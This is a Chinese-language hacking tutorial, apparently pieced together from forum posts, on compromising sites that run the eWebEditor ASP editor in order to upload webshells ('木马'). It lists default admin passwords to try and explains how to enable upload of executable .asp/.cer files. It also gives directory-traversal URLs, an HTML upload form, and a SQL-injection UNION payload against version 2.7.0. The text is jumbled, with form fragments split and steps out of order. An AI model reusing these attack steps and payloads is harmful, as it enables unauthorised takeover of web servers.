这样我们可以上各种格式的木马 我们只要把木马改成添加的这些格式就可以了
拿webshell方法第五种方法
ewebeditor 鸡肋的上传漏洞
首先先看下ewebeditor/asp/upload.asp 上传地址存在不
存在就
把下面的代码
<form action="这里写上传地址?action=savetype=image&style=popup&cusdir=a.asp" method=post name=myform enctype="multipart/form-data">
设置成功后,访问asp/config.asp文件即可,一句话木马被写入到这个文件里面了.
然后用一句话客户端连接
拿webshell方法第三种方法
ewebeditor不登陆也获程看
使用默认密码:admin/admin888 或 admin/admin 进入后台,也可尝试 admin/123456 (有些管理员以及一些CMS,就是这么设置的)
点击“样式管理”--可以选择新增样式,或者修改一个非系统样式,将其中图片控件所允许的上传类型后面加上|asp、|asa、|aaspsp或|cer,只要是服务器允许执行的脚本类型即可,点击“提交”并设置工具栏--将“插入图片”控件添加上。而后--预览此样式,点击插入图片,上传WEBSHELL,在“代码”模式中查看上传文件的路径。
5、不能添加工具栏,但设定好了某样式中的文件类型,怎么办?↓这么办!
(请修改action字段)
Action.html
eWebEditor踩脚印式入侵
脆弱描述:
当我们下载数据库后查询不到密码MD5的明文时,可以去看看webeditor_style(14)这个样式表,看看是否有前辈入侵过 或许已经赋予了某控件上传脚本的能力,构造地址来上传我们自己的WEBSHELL.
再加 &dir=../..
&dir=/../.. 看到整个网站文件了
第二种: ewebeditor/admin/upload.asp?id=16&d_viewmode=&dir =./..
eWebEditor 5.2 列目录漏洞
脆弱描述:
ewebeditor/asp/browse.asp
攻击利用:
比如 ID=46 s-name =standard1
构造 代码: ewebeditor.asp?id=content&style=standard
ID和和样式名改过后
ewebeditor.asp?id=46&style=standard1
上传路径:写上这个admin/ 或写/ 免的别人把UploadFile/目录删了 我们找不到马
内容路径:空 记得
图片限制:写上1000 免的上不了我们的asp木马
然后我们就可以提交了
就可以看到样式增加成功!
然后我们按-返回样式管理 找到刚才添加的样式名称 然后按工具栏 在按新增工具栏
<input type=file name=uploadfile size=100><br><br>
<input type=submit value=Fuck>
</form>
改上传地址保存为chouxiaozi.HTM文件,打开可以直接上传CER文件,测试成功.上传后地址看源文件
就可以看到我们上传的路径和地址
ewebeditor asp版2.1.6上传漏洞利用程序.html
eWebEditor 2.7.0 注入漏洞
攻击利用:
<form action="这里写上传地址?action=save&type=IMAGE&style=luoye' union select S_ID,S_Name,S_Dir,S_CSS,S_UploadDir,S_Width,S_Height,S_Memo,S_IsSys,S_FileExt,S_FlashExt, [S_ImageExt]%2b'|cer',S_MediaExt,S_FileSize,S_FlashSize,S_ImageSize,S_MediaSize,S_StateFlag,S_DetectFromWord,S_InitMode,S_BaseUrl from ewebeditor_style where s_name='standard'and'a'='a" method=post name=myform enctype="multipart/form-data">
拿webshell方法第四种方法
利用ewebeditor asp版 2.1.6 上传漏洞利用程序
首先先看eWebEditor/upload.asp 上传地址存在不